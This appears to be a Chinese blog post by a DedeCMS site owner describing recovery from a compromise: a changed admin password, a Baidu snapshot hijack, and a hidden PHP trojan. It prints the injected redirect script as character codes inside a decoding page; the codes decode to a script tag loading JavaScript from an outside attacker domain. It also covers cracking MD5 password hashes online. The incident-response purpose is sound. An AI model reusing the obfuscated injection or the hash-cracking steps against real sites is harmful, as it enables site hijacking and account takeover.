阿里云的轻量级服务器、新网的域名、dedecms
篡改密码
被篡改密码,可以使用一些数据库管理的工具来查看被改的密码,我这里用的是phpmyadmin
http://域名/phpMyAdmin
输入自己的数据库账号和密码(默认都是root),我这里是阿里云的密码
点击默认生成的数据库里面的默认存放管理员的账号、密码dede_admin
里面的uname为账号,pwd为密码(md5值),用下方的在线解密
https://www.somd5.com/
拿着解开的密码去登陆就OK了
百度快照劫持
发现的过程:
如上方可见,点击进去就会跳转到bc网站。
打开我们网站的源代码(f12)可见:
看似是乱码,其实是unicode编码
解码:
这里则是百度后(String.fromCharCode)
fromCharCode() 可接受一个指定的 Unicode 值,然后返回一个字符串
把下面的代码保存到一个html文件,把数字输入进去然后打开
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<p id="a">出现吧!</p>
<script>
var n=String.fromCharCode(115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,100,100,46,106,115,34,62,47,115,99,114,105,112,116,62);
document.getElementById("a").innerHTML=n;
</script>
</body>
</html>
得到以下网址,打开得到以下界面:
百度了一下才知道是百度快照劫持,那么我们怎么解决呢,百度啊!
解决办法:
下面是我的解决方法:先打开ftp然后打开存在哪些html的源码,清除之后可以看到整个世界都清净了
然后我们可以打包源码到本地,然后用一些杀毒软件和一些安全狗、D盾等,这里我用的是火绒
点击病毒查杀----自定义查杀-----选择打包的源码等文件
或者看看根目录是否存在一些你网站本来没有的东西
可以看到这里有个aaa.php就是一个免杀的木马,奈斯,直接获得一枚,有发现木马的可以给我:3075999532